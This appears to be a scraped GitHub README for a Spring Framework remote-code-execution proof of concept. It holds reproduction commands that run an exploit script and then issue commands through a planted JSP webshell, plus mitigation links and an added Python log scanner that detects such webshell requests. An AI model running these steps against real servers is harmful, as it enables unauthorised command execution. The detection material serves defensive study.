
GitHub - craig/SpringCore0day: SpringCore0day from https://share.vx-underground....

 2 years ago
source link: https://github.com/craig/SpringCore0day

Information

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/?s=03

https://github.com/tweedge/springcore-0day-en

How to reproduce

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

python3 ./exp.py --url http://192.168.0.11:8082

curl --output - "http://192.168.0.11:8082/tomcatwar.jsp?pwd=j&cmd=id"
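A defender's view of the last step above, as an added example that is not part of the original README: a Python scan of web access logs for requests shaped like the `tomcatwar.jsp?pwd=...&cmd=...` call. The combined log format, the sample lines, the function name and the severity labels are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined access-log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [31/Mar/2022:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 512
192.0.2.66 - - [31/Mar/2022:10:03:40 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 200 61
192.0.2.66 - - [31/Mar/2022:10:03:55 +0000] "GET /TomcatWar.jsp?pwd=j&cmd=uname%20-a HTTP/1.1" 200 98
192.0.2.20 - - [31/Mar/2022:10:05:00 +0000] "GET /search.jsp?cmd=list HTTP/1.1" 200 300
192.0.2.77 - - [31/Mar/2022:10:06:12 +0000] "GET /shell.jsp?cmd=whoami&pwd=x HTTP/1.1" 404 0
this line is not an access-log entry
"""

# File name taken from the README's curl step; other names are only "medium".
SHELL_NAME = "tomcatwar.jsp"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_webshell_hits(log_text):
    """Return one dict per request that carries both pwd= and cmd= to a JSP."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.lower().endswith(".jsp") or not params.keys() >= {"pwd", "cmd"}:
            continue
        name = url.path.rsplit("/", 1)[-1].lower()
        # A 200 on the known file name means the dropped JSP exists and answered.
        served = name == SHELL_NAME and m["status"] == "200"
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": url.path,
            "cmd": params["cmd"][0],  # parse_qs has already URL-decoded this
            "status": int(m["status"]),
            "severity": "high" if served else "medium",
        })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```

A "high" hit means the file was served from the webroot, so the host should be treated as compromised rather than merely probed.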

Mitigations

https://github.com/blindpirate/spring-rce-2022-03-hotfix (untested)

https://www.praetorian.com/blog/spring-core-jdk9-rce/

Spring Core RCE

After Spring Cloud, on 3.29, another major Spring vulnerability was reported online: Spring Core RCE

(Note from craig: Spring Cloud exploit here: https://github.com/hktalent/spring-spel-0day-poc)

A coded PoC is in circulation.

**The exploit has now been uploaded as exp.py.**

An official Spring patch is also being actively prepared.

Link to patches in production for Spring

The vulnerability affects applications that:

  1. run on JDK version 9 or above
  2. use Spring Framework or derivative frameworks

Vulnerability Fix Recommendations

Currently, Spring has not released a patch, so we recommend lowering the JDK version as a temporary solution.

Translated with www.DeepL.com/Translator (free version)

